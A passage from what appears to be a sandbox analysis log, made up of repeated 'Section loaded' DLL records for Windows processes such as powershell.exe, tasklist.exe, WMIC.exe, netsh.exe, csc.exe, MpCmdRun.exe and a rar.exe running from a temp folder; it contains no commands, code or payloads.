              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: rsaenh.dll
